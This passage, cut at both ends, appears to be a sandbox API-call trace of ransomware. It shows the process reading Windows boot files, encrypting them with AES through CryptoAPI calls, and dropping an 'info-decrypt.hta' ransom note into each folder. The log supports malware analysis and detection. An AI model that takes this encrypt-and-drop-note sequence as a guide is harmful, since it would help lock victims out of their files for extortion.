"c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0163.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0163.614] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\kor_boot.ttf", lpFilePart=0x0) returned 0x1a [0163.614] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0163.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0163.614] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta" (normalized: "c:\\boot\\fonts\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x190121e0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x190121e0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x19142ce0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0163.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0163.614] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\kor_boot.ttf", lpFilePart=0x0) returned 0x1a [0163.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0163.615] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), fInfoLevelId=0x0, lpFileInformation=0x36c864c | out: lpFileInformation=0x36c864c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20)) returned 1 [0163.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0163.616] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\kor_boot.ttf", lpFilePart=0x0) returned 0x1a [0163.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0163.616] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0163.616] GetFileType (hFile=0x45c) returned 0x1 [0163.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0163.616] GetFileType (hFile=0x45c) returned 0x1 [0163.616] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x242f20 [0163.616] ReadFile (in: hFile=0x45c, lpBuffer=0xaeaf708, nNumberOfBytesToRead=0x242f20, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0xaeaf708*, lpNumberOfBytesRead=0x6a7f1bc*=0x242f20, lpOverlapped=0x0) returned 1 [0163.916] CloseHandle (hObject=0x45c) returned 1 [0163.916] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xb1daf8) returned 1 [0163.917] CryptGenRandom (in: hProv=0xb1daf8, dwLen=0x10, pbBuffer=0x36c8afc | out: pbBuffer=0x36c8afc) returned 1 [0164.794] CryptImportKey (in: hProv=0xb1daf8, pbData=0x35c407c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f890) returned 1 [0164.795] CryptContextAddRef (hProv=0xb1daf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0164.795] CryptContextAddRef (hProv=0xb1daf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0164.795] CryptDuplicateKey (in: hKey=0xb7f890, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7fb90) returned 1 [0164.795] CryptContextAddRef (hProv=0xb1daf8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0164.795] CryptSetKeyParam (hKey=0xb7fb90, dwParam=0x4, pbData=0x35c415c*=0x1, dwFlags=0x0) returned 1 [0164.795] CryptSetKeyParam (hKey=0xb7fb90, dwParam=0x1, pbData=0x35c4128, dwFlags=0x0) returned 1 [0164.810] CryptEncrypt (in: hKey=0xb7fb90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb0f2648*, pdwDataLen=0x6a7f188*=0x242f30, dwBufLen=0x242f30 | out: pbData=0xb0f2648*, pdwDataLen=0x6a7f188*=0x242f30) returned 1 [0165.642] CryptEncrypt (in: hKey=0xb7fb90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35c4184*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x35c4184*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0165.644] CryptDestroyKey (hKey=0xb7f890) returned 1 [0165.644] CryptReleaseContext (hProv=0xb1daf8, dwFlags=0x0) returned 1 [0165.645] CryptReleaseContext (hProv=0xb1daf8, dwFlags=0x0) returned 1 [0165.645] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\kor_boot.ttf", lpFilePart=0x0) returned 0x1a [0165.645] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0165.645] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0165.647] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0165.647] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\wgl4_boot.ttf", lpFilePart=0x0) returned 0x1b [0165.647] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0165.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0165.648] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\info-decrypt.hta" (normalized: "c:\\boot\\fonts\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x190121e0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x190121e0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x19142ce0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0165.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0165.648] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\wgl4_boot.ttf", lpFilePart=0x0) returned 0x1b [0165.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0165.648] GetFileAttributesExW (in: lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), fInfoLevelId=0x0, lpFileInformation=0x36bfd94 | out: lpFileInformation=0x36bfd94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c)) returned 1 [0165.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0165.648] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\wgl4_boot.ttf", lpFilePart=0x0) returned 0x1b [0165.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0165.649] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4d0 [0165.649] GetFileType (hFile=0x4d0) returned 0x1 [0165.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0165.649] GetFileType (hFile=0x4d0) returned 0x1 [0165.649] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0xb95c [0165.649] ReadFile (in: hFile=0x4d0, lpBuffer=0x36bfefc, nNumberOfBytesToRead=0xb95c, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x36bfefc*, lpNumberOfBytesRead=0x6a7f1bc*=0xb95c, lpOverlapped=0x0) returned 1 [0167.345] CloseHandle (hObject=0x4d0) returned 1 [0167.346] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xbdf948) returned 1 [0167.347] CryptGenRandom (in: hProv=0xbdf948, dwLen=0x10, pbBuffer=0x368fcf4 | out: pbBuffer=0x368fcf4) returned 1 [0168.775] CryptImportKey (in: hProv=0xbdf948, pbData=0x3616308, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f9d0) returned 1 [0168.775] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0168.775] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0168.775] CryptDuplicateKey (in: hKey=0xb7f9d0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f790) returned 1 [0168.775] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0168.775] CryptSetKeyParam (hKey=0xb7f790, dwParam=0x4, pbData=0x36163e8*=0x1, dwFlags=0x0) returned 1 [0168.775] CryptSetKeyParam (hKey=0xb7f790, dwParam=0x1, pbData=0x36163b4, dwFlags=0x0) returned 1 [0168.776] CryptEncrypt (in: hKey=0xb7f790, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36163f8*, pdwDataLen=0x6a7f188*=0xb960, dwBufLen=0xb960 | out: pbData=0x36163f8*, pdwDataLen=0x6a7f188*=0xb960) returned 1 [0168.777] CryptEncrypt (in: hKey=0xb7f790, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3621d7c*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x3621d7c*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0168.792] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0168.792] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0168.792] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0168.792] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\wgl4_boot.ttf", lpFilePart=0x0) returned 0x1b [0168.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0168.792] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0168.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0168.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0168.796] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0168.796] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\", lpFilePart=0x0) returned 0xe [0168.796] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f9d0 [0168.797] FindNextFileW (in: hFindFile=0xb7f9d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.798] FindNextFileW (in: hFindFile=0xb7f9d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0168.798] FindNextFileW (in: hFindFile=0xb7f9d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0168.798] FindClose (in: hFindFile=0xb7f9d0 | out: hFindFile=0xb7f9d0) returned 1 [0168.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0168.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0168.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0168.798] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR", lpFilePart=0x0) returned 0xd [0168.798] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\", lpFilePart=0x0) returned 0xe [0168.799] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f9d0 [0168.799] FindNextFileW (in: hFindFile=0xb7f9d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.799] FindNextFileW (in: hFindFile=0xb7f9d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0168.799] FindNextFileW (in: hFindFile=0xb7f9d0, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0168.799] FindClose (in: hFindFile=0xb7f9d0 | out: hFindFile=0xb7f9d0) returned 1 [0168.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0168.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0168.800] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0168.800] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0168.800] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0168.800] GetFileAttributesExW (in: lpFileName="C:\\Boot\\fr-FR\\info-decrypt.hta" (normalized: "c:\\boot\\fr-fr\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0168.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0168.800] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0168.800] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0168.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0168.801] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\info-decrypt.hta" (normalized: "c:\\boot\\fr-fr\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4a8 [0168.801] GetFileType (hFile=0x4a8) returned 0x1 [0168.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0168.801] GetFileType (hFile=0x4a8) returned 0x1 [0168.802] WriteFile (in: hFile=0x4a8, lpBuffer=0x3624be8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x3624be8*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0168.802] WriteFile (in: hFile=0x4a8, lpBuffer=0x3624be8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x3624be8*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0168.803] CloseHandle (hObject=0x4a8) returned 1 [0168.803] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0168.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0168.803] GetFileAttributesExW (in: lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x3625c04 | out: lpFileInformation=0x3625c04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40)) returned 1 [0168.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0168.804] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0168.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0168.804] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0168.804] GetFileType (hFile=0x4a8) returned 0x1 [0168.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0168.804] GetFileType (hFile=0x4a8) returned 0x1 [0168.804] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x16c40 [0168.805] ReadFile (in: hFile=0x4a8, lpBuffer=0x48070d8, nNumberOfBytesToRead=0x16c40, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x48070d8*, lpNumberOfBytesRead=0x6a7f1bc*=0x16c40, lpOverlapped=0x0) returned 1 [0169.546] CloseHandle (hObject=0x4a8) returned 1 [0169.546] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xb1e950) returned 1 [0169.548] CryptGenRandom (in: hProv=0xb1e950, dwLen=0x10, pbBuffer=0x3626434 | out: pbBuffer=0x3626434) returned 1 [0170.795] CryptImportKey (in: hProv=0xb1e950, pbData=0x392e488, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f890) returned 1 [0170.795] CryptContextAddRef (hProv=0xb1e950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0170.796] CryptContextAddRef (hProv=0xb1e950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0170.796] CryptDuplicateKey (in: hKey=0xb7f890, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f790) returned 1 [0170.796] CryptContextAddRef (hProv=0xb1e950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0170.796] CryptSetKeyParam (hKey=0xb7f790, dwParam=0x4, pbData=0x392e568*=0x1, dwFlags=0x0) returned 1 [0170.796] CryptSetKeyParam (hKey=0xb7f790, dwParam=0x1, pbData=0x392e534, dwFlags=0x0) returned 1 [0170.796] CryptEncrypt (in: hKey=0xb7f790, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x54a6b90*, pdwDataLen=0x6a7f188*=0x16c50, dwBufLen=0x16c50 | out: pbData=0x54a6b90*, pdwDataLen=0x6a7f188*=0x16c50) returned 1 [0170.797] CryptEncrypt (in: hKey=0xb7f790, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x392e590*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x392e590*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0170.798] CryptDestroyKey (hKey=0xb7f890) returned 1 [0170.798] CryptReleaseContext (hProv=0xb1e950, dwFlags=0x0) returned 1 [0170.798] CryptReleaseContext (hProv=0xb1e950, dwFlags=0x0) returned 1 [0170.799] GetFullPathNameW (in: lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0170.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0170.799] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 